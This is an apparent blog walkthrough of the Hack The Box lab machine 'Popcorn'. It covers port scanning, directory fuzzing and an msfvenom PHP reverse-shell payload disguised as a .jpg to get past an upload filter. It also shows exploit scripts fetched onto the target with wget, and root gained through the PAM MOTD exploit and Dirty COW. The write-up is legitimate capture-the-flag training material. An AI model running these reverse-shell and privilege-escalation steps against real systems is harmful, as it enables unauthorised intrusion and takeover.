<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='[*] INDEX:  BOX INFO GAINING ACCESS MOTD PRIVILEGE ESCALATION DIRTY COW PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.6[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.6
 PORT STATE SERVICE22/tcp open ssh80/tcp open httpOnce seen open ports, let&amp;rsquo;s get a deeper scan :'><title>[10] Popcorn Hackthebox</title>

<link rel='canonical' href='https://example.com/posts/popcorn-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[10] Popcorn Hackthebox'>
<meta property='og:description' content='[*] INDEX:  BOX INFO GAINING ACCESS MOTD PRIVILEGE ESCALATION DIRTY COW PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.6[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.6
 PORT STATE SERVICE22/tcp open ssh80/tcp open httpOnce seen open ports, let&amp;rsquo;s get a deeper scan :'>
<meta property='og:url' content='https://example.com/posts/popcorn-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-03-27T18:55:47&#43;01:00'/><meta property='article:modified_time' content='2021-03-27T18:55:47&#43;01:00'/>
<meta name="twitter:title" content="[10] Popcorn Hackthebox">
<meta name="twitter:description" content="[*] INDEX:  BOX INFO GAINING ACCESS MOTD PRIVILEGE ESCALATION DIRTY COW PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.6[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.6
 PORT STATE SERVICE22/tcp open ssh80/tcp open httpOnce seen open ports, let&amp;rsquo;s get a deeper scan :">
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/popcorn-hackthebox/">[10] Popcorn Hackthebox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Mar 27, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <p><img src="/static/HACKING/popcorn-index.jpg" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="-index">[*] INDEX:</h1>
<ul>
<li><a class="link" href="#-box-info--" >BOX INFO</a></li>
<li><a class="link" href="#-part-1---gain-access" >GAINING ACCESS</a></li>
<li><a class="link" href="#-part-21---motd-privesc" >MOTD PRIVILEGE ESCALATION</a></li>
<li><a class="link" href="#-part-22---dirty-cow-privesc" >DIRTY COW PRIVILEGE ESCALATION</a></li>
</ul>
<h1 id="-box-info-computer-">[+] BOX INFO :computer: :</h1>
<pre><code>Operative System : Linux :penguin:
Difficulty : Medium :first_quarter_moon:
Owner : ch4p
IP : 10.10.10.6
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>The first step is scanning machine&rsquo;s ports with nmap:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-p-&#43;--open&#43;-T5&#43;-n&#43;10.10.10.6"  target="_blank" rel="noopener"
    >nmap -p- &ndash;open -T5 -n 10.10.10.6</a></p>
</blockquote>
<pre><code>PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</code></pre><p>Once seen open ports, let&rsquo;s get a deeper scan :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-sV&#43;-sC&#43;-sS&#43;-p22%2C80&#43;10.10.10.6"  target="_blank" rel="noopener"
    >nmap -sV -sC -sS -p22,80 10.10.10.6</a></p>
</blockquote>
<pre><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>Here we just can point out the http server, so, let&rsquo;s check it :</p>
<p><img src="/static/HACKING/popcorn-1.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s try to get some info from the website, I&rsquo;ll be using <code>whatweb</code> :</p>
<blockquote>
<p>[whatweb http://10.10.10.6/]</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-bash" data-lang="bash">http://10.10.10.6/ <span class="o">[</span><span class="m">200</span> OK<span class="o">]</span> Apache<span class="o">[</span>2.2.12<span class="o">]</span>, Country<span class="o">[</span>RESERVED<span class="o">][</span>ZZ<span class="o">]</span>, HTTPServer<span class="o">[</span>Ubuntu Linux<span class="o">][</span>Apache/2.2.12 <span class="o">(</span>Ubuntu<span class="o">)]</span>, IP<span class="o">[</span>10.10.10.6<span class="o">]</span>
</code></pre></div><p>Hmm nothing interesting, let&rsquo;s fuzz the website, I&rsquo;ll be using <code>wfuzz</code> :</p>
<blockquote>
<p>wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt &ndash;hc=404 -L -u http://10.10.10.6/FUZZ</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">000000600:   <span class="m">200</span>        <span class="m">656</span> L    <span class="m">3119</span> W     <span class="m">47507</span> Ch    <span class="s2">&#34;test&#34;</span>                                            
000003762:   <span class="m">200</span>        <span class="m">293</span> L    <span class="m">882</span> W      <span class="m">11356</span> Ch    <span class="s2">&#34;torrent&#34;</span>                                         
000010628:   <span class="m">200</span>        <span class="m">0</span> L      <span class="m">4</span> W        <span class="m">95</span> Ch       <span class="s2">&#34;rename&#34;</span>                                          
000041849:   <span class="m">200</span>        <span class="m">4</span> L      <span class="m">25</span> W       <span class="m">177</span> Ch      <span class="s2">&#34;http://10.10.10.6/&#34;</span>
</code></pre></div><p>Let&rsquo;s go to &ldquo;test&rdquo;:</p>
<p><img src="/static/HACKING/popcorn-2.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>There are two recognized services, we will take them into account in case we need them later, let&rsquo;s see &ldquo;torrent&rdquo;:</p>
<p><img src="/static/HACKING/popcorn-3.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s create a user :</p>
<p><img src="/static/HACKING/popcorn-4.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<blockquote>
<p>Creds I used -&gt; <code>user:user</code></p>
</blockquote>
<p>Maybe there is a Torrent Hoster vulnerability.</p>
<p><img src="/static/HACKING/popcorn-5.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Yeah, and it has an exploit for it, I followed <a class="link" href="https://www.youtube.com/watch?v=7r-gf_LoTuQ"  target="_blank" rel="noopener"
    >this video</a></p>
<p><img src="/static/HACKING/popcorn-6.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s upload a torrent file, in my case I used an example file from <a class="link" href="https://webtorrent.io/free-torrents"  target="_blank" rel="noopener"
    >here</a></p>
<p><img src="/static/HACKING/popcorn-7.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Once uploaded our torrent file, let&rsquo;s create our payload, I&rsquo;ll get the command from this <a class="link" href="https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/"  target="_blank" rel="noopener"
    >cheat sheet</a>:</p>
<blockquote>
<p>msfvenom -p php/reverse_php LHOST=10.10.14.36 LPORT=8989 -f raw &gt; shell.php</p>
</blockquote>
<p>We have to bypass the file, so let&rsquo;s add the <code>.jpg</code> extension to the file :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=mv&#43;shell.php&#43;shell.php.jpg"  target="_blank" rel="noopener"
    >mv shell.php shell.php.jpg</a></p>
</blockquote>
<p>Once done that, we have to open <code>burpsuite</code> and upload our payload :</p>
<p><img src="/static/HACKING/popcorn-8.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Intercepting it with Burp :</p>
<p><img src="/static/HACKING/popcorn-9.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s send the request :</p>
<p><img src="/static/HACKING/popcorn-10.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Now copy the image file link, and make a request to it:</p>
<p><img src="/static/HACKING/popcorn-11.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><img src="/static/HACKING/popcorn-12.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><img src="/static/HACKING/popcorn-13.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Nice, got a shell as www-data. Let&rsquo;s ennumerate the system&hellip;</p>
<h1 id="-part-21---motd-privesc">[+] PART 2.1 - MOTD PRIVESC</h1>
<p>Inside george directory I found a bunch of not common files and directories :</p>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">3</span> <span class="n">george</span> <span class="n">george</span>   <span class="m">4096</span> <span class="n">Oct</span> <span class="m">26</span> <span class="m">19</span><span class="o">:</span><span class="m">35</span> <span class="n">.
</span><span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">3</span> <span class="n">root</span>   <span class="n">root</span>     <span class="m">4096</span> <span class="n">Mar</span> <span class="m">17</span>  <span class="m">2017</span> <span class="n">..</span>
<span class="n">lrwxrwxrwx</span> <span class="m">1</span> <span class="n">george</span> <span class="n">george</span>      <span class="m">9</span> <span class="n">Oct</span> <span class="m">26</span> <span class="m">19</span><span class="o">:</span><span class="m">35</span> <span class="n">.bash_history</span> <span class="o">-&gt;</span> <span class="o">/</span><span class="n">dev</span><span class="o">/</span><span class="n">null</span>
<span class="o">-</span><span class="n">rw</span><span class="o">-</span><span class="n">r</span><span class="o">--</span><span class="n">r</span><span class="o">--</span> <span class="m">1</span> <span class="n">george</span> <span class="n">george</span>    <span class="m">220</span> <span class="n">Mar</span> <span class="m">17</span>  <span class="m">2017</span> <span class="n">.bash_logout</span>
<span class="o">-</span><span class="n">rw</span><span class="o">-</span><span class="n">r</span><span class="o">--</span><span class="n">r</span><span class="o">--</span> <span class="m">1</span> <span class="n">george</span> <span class="n">george</span>   <span class="m">3180</span> <span class="n">Mar</span> <span class="m">17</span>  <span class="m">2017</span> <span class="n">.bashrc</span>
<span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="m">2</span> <span class="n">george</span> <span class="n">george</span>   <span class="m">4096</span> <span class="n">Mar</span> <span class="m">17</span>  <span class="m">2017</span> <span class="n">.cache</span>
<span class="o">-</span><span class="n">rw</span><span class="o">-------</span> <span class="m">1</span> <span class="n">root</span>   <span class="n">root</span>     <span class="m">1571</span> <span class="n">Mar</span> <span class="m">17</span>  <span class="m">2017</span> <span class="n">.mysql_history</span>
<span class="o">-</span><span class="n">rw</span><span class="o">-------</span> <span class="m">1</span> <span class="n">root</span>   <span class="n">root</span>       <span class="m">19</span> <span class="n">May</span>  <span class="m">5</span>  <span class="m">2017</span> <span class="n">.nano_history</span>
<span class="o">-</span><span class="n">rw</span><span class="o">-</span><span class="n">r</span><span class="o">--</span><span class="n">r</span><span class="o">--</span> <span class="m">1</span> <span class="n">george</span> <span class="n">george</span>    <span class="m">675</span> <span class="n">Mar</span> <span class="m">17</span>  <span class="m">2017</span> <span class="n">.profile</span>
<span class="o">-</span><span class="n">rw</span><span class="o">-</span><span class="n">r</span><span class="o">--</span><span class="n">r</span><span class="o">--</span> <span class="m">1</span> <span class="n">george</span> <span class="n">george</span>      <span class="m">0</span> <span class="n">Mar</span> <span class="m">17</span>  <span class="m">2017</span> <span class="n">.sudo_as_admin_successful</span>
<span class="o">-</span><span class="n">rw</span><span class="o">-</span><span class="n">r</span><span class="o">--</span><span class="n">r</span><span class="o">--</span> <span class="m">1</span> <span class="n">george</span> <span class="n">george</span> <span class="m">848727</span> <span class="n">Mar</span> <span class="m">17</span>  <span class="m">2017</span> <span class="n">torrenthoster.zip</span>
<span class="o">-</span><span class="n">rw</span><span class="o">-</span><span class="n">r</span><span class="o">--</span><span class="n">r</span><span class="o">--</span> <span class="m">1</span> <span class="n">george</span> <span class="n">george</span>     <span class="m">33</span> <span class="n">Mar</span> <span class="m">27</span> <span class="m">20</span><span class="o">:</span><span class="m">02</span> <span class="n">user.txt</span>
</code></pre></div><p>Inside /home/george/.cache I found this :</p>
<pre><code>motd.legal-displayed
</code></pre><p>Hmm this is interesting, let&rsquo;s see what&rsquo;s &ldquo;motd&rdquo; : <code>The /etc/motd is a file on Unix-like systems that contains a &quot;message of the day&quot;, used to send a common message to all users in a more efficient manner than sending them all an e-mail message. </code></p>
<p>So, let&rsquo;s see with <code>searchsploit</code>:</p>
<blockquote>
<p>sarchsploit motd</p>
</blockquote>
<pre><code>--------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                   |  Path
--------------------------------------------------------------------------------- ---------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation ( | linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation ( | linux/local/14339.sh
MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion                        | windows/dos/1235.c
--------------------------------------------------------------------------------- ---------------------------------
</code></pre><p>Oh interesting&hellip; Let&rsquo;s check if the Linux PAM (Linux Pluggable Authentication Modules) is 1.1.0 :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=dpkg&#43;-l&#43;%7C&#43;grep&#43;pam"  target="_blank" rel="noopener"
    >dpkg -l | grep pam</a></p>
</blockquote>
<pre><code>ii  libpam-modules                      1.1.0-2ubuntu1                    Pluggable Authentication Modules for PAM
ii  libpam-runtime                      1.1.0-2ubuntu1                    Runtime support for the PAM library
ii  libpam0g                            1.1.0-2ubuntu1                    Pluggable Authentication Modules library
ii  python-pam                          0.4.2-12ubuntu3                   A Python interface to the PAM library
</code></pre><p>And certainly yes, that&rsquo;s the version we&rsquo;re looking for, let&rsquo;s use that exploit.</p>
<h3 id="from-our-local-machine-">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server"  target="_blank" rel="noopener"
    >python3 -m http.server</a></p>
</blockquote>
<h3 id="from-the-victime-machine-">From the victime machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=wget&#43;http%3A%2F%2F10.10.14.36%3A8000%2F14273.sh"  target="_blank" rel="noopener"
    >wget http://10.10.14.36:8000/14273.sh</a></p>
</blockquote>
<p>I tried to execute it, but I don&rsquo;t know why the shell doesn&rsquo;t allow me to do it, so let&rsquo;s try to get another shell, now I&rsquo;ll try to use the <a class="link" href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php"  target="_blank" rel="noopener"
    >Php reverse shell from PentestMonkey</a></p>
<p>Now the <code>shell.php</code> we uploaded is useless, let&rsquo;s do the same process with the new reverse-shell.</p>
<p><img src="/static/HACKING/popcorn-14.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>There we go! Let&rsquo;s see if we can execute the file :</p>
<p><img src="/static/HACKING/popcorn-15.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Hmmm I don&rsquo;t really understand why can&rsquo;t I execute this, let&rsquo;s try :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=bash&#43;14273.sh"  target="_blank" rel="noopener"
    >bash 14273.sh</a></p>
</blockquote>
<pre><code>: command not found
14273.sh: line 30: syntax error: unexpected end of file
</code></pre><p>Oh, so bad! Let&rsquo;s use the other exploit : <code>14339.sh</code>.</p>
<h3 id="from-our-local-machine--1">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server"  target="_blank" rel="noopener"
    >python3 -m http.server</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=wget&#43;http%3A%2F%2F10.10.14.36%3A8000%2F14339.sh"  target="_blank" rel="noopener"
    >wget http://10.10.14.36:8000/14339.sh</a></p>
</blockquote>
<p>What? Syntax error is not a usual mistake on this kind of exploits, maybe we&rsquo;re not on the platform that exploit was coded for, so I&rsquo;ll be using <code>dos2unix</code> to turn a DOS format script into a UNIX format script.</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=dos2unix&#43;14339.sh"  target="_blank" rel="noopener"
    >dos2unix 14339.sh</a></p>
</blockquote>
<pre><code>dos2unix: convirtiendo archivo 14339.sh a formato Unix..
</code></pre><p>Now let&rsquo;s transfer the file to the victim machine through python http method. And execute it :</p>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="n">./14339.sh</span> 
<span class="n">[</span><span class="o">*</span><span class="n">]</span> <span class="n">Ubuntu</span> <span class="n">PAM</span> <span class="n">MOTD</span> <span class="n">local</span> <span class="n">root</span>
<span class="n">[</span><span class="o">*</span><span class="n">]</span> <span class="n">SSH</span> <span class="n">key</span> <span class="n">set</span> <span class="n">up</span>
<span class="n">[</span><span class="o">*</span><span class="n">]</span> <span class="n">spawn</span> <span class="n">ssh</span>
<span class="n">[</span><span class="o">+</span><span class="n">]</span> <span class="n">owned</span><span class="o">:</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">passwd</span>
<span class="n">[</span><span class="o">*</span><span class="n">]</span> <span class="n">spawn</span> <span class="n">ssh</span>
<span class="n">[</span><span class="o">+</span><span class="n">]</span> <span class="n">owned</span><span class="o">:</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">shadow</span>
<span class="n">[</span><span class="o">*</span><span class="n">]</span> <span class="n">SSH</span> <span class="n">key</span> <span class="n">removed</span>
<span class="n">[</span><span class="o">+</span><span class="n">]</span> <span class="n">Success</span><span class="o">!</span> <span class="n">Use</span> <span class="n">password</span> <span class="n">toor</span> <span class="n">to</span> <span class="n">get</span> <span class="n">root</span>
<span class="n">Password</span><span class="o">:</span> 
<span class="n">whoami</span>
<span class="n">root</span>
</code></pre></div><h1 id="-part-22---dirty-cow-privesc">[+] PART 2.2 - DIRTY COW PRIVESC</h1>
<p>This second way is a kernel vulnerability :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=uname&#43;-a"  target="_blank" rel="noopener"
    >uname -a</a></p>
</blockquote>
<pre><code>Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
</code></pre><p><img src="/static/HACKING/popcorn-16.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>So this is vulnerable to DirtyCow, let&rsquo;s download it.</p>
<p>Get it into victim machine and run this :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=gcc&#43;-pthread&#43;dirty.c&#43;-o&#43;dirty&#43;-lcrypt"  target="_blank" rel="noopener"
    >gcc -pthread dirty.c -o dirty -lcrypt</a></p>
</blockquote>
<blockquote>
<p>[./dirty new_pass]</p>
</blockquote>
<p>And now login into firefart with ssh:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=ssh&#43;firefart%4010.10.10.6"  target="_blank" rel="noopener"
    >ssh firefart@10.10.10.6</a></p>
</blockquote>
<p><img src="/static/HACKING/popcorn-17.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="thanks-for-reading--">THANKS FOR READING 😊 !!</h1>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
